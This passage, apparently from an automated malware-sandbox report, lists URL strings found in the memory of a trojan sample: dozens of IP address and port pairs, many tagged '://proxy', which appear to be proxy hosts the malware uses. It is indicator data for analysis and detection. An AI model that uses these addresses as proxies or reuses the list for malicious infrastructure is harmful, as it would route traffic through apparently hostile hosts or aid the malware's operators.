                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.210.45.148:11176
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.210.45.148:11176://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.210.45.148:19873
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.210.45.148:19873://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.210.45.148:36424
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.210.45.148:36424://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA652000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.210.45.148:36721
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA66A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.210.45.148:36721://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.210.45.148:3865
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.210.45.148:3865://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7D82000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.210.45.148:41855
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.210.45.148:41855://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.210.45.148:60359
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.210.45.148:60359://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBC5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.210.45.148:8772
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBC5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.210.45.148:8772://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.210.45.148:9351
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.210.45.148:9351://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.155.142
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.155.142://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.155.142:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:22538
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:22538://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C930F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:2563
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C927B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:2563://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:46286
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7FEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:46286://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:5717
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:5717://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.8:29877
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.8:29877://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.8:36411
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.8:36411://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.8:50565
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.8:50565://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.8:55452
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.8:55452://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.250.13.88
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.250.13.88://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.250.13.88:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.250.2.171:40186
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.250.2.171:40186://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C783D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.254.149.59:52177
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.254.149.59:52177://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.255.20.138
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.255.20.138://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.255.20.138:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.255.79.114:12682
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.255.79.114:12682://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.14.161:23306
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.14.161:23306://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.14.161:32229
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.14.161:32229://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.14.161:51392
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.14.161:51392://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.63.124:27294
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.63.124:27294://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C761E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C763C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.64.38:2281
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C763C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.64.38:2281://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD85000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBBA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.64.38:64942
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.64.38:64942://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB11A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.68.164.77:15810
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB11A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.68.164.77:15810://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.68.164.77:5367
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.68.164.77:5367://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.68.164.77:8095
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.68.164.77:8095://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.68.220.201:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.68.220.201:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.68.87.173:29212
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.68.87.173:29212://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64C4000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C70EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.122.102:25522
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.122.102:25522://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.125.208:15084
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.125.208:15084://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD8A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.125.208:18080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.125.208:18080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9145000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.125.208:33356
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8E32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.125.208:33356://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.125.208:41649
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C81FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.125.208:41649://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.125.208:54879
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.125.208:54879://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7652000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.125.208:62727
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.125.208:62727://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.126.150:11802
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.126.150:11802://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C776C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C77C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.126.150:21803
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C77B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.126.150:21803://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.126.150:22935
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.126.150:22935://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA50C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.126.150:36694
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA50C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.126.150:36694://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.126.150:41271
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.126.150:41271://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7560000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C757D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.126.150:4228
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.126.150:4228://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.126.150:64615
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.126.150:64615://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.206.209
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBB63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.206.209://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBB63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.206.209:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8189000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.248.35:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.248.35:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9499000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA81E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.42.129:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9499000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.42.129:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.77.65.164:31979
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.77.65.164:31979://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD07F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.77.72.203
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD07F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.77.72.203://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD07F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.77.72.203:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.79.249.186:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.79.249.186:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.79.51.145:29291
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.79.51.145:29291://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.79.87.144:18636
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.79.87.144:18636://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEC2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.79.87.144:22500
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBF8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.79.87.144:22500://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.79.87.144:54395
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.79.87.144:54395://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C83AE000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD07F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.79.87.144:8533
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.79.87.144:8533://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.81.186.179:51405
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.81.186.179:51405://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.81.186.179:58630
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.81.186.179:58630://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.83.116.6:62583
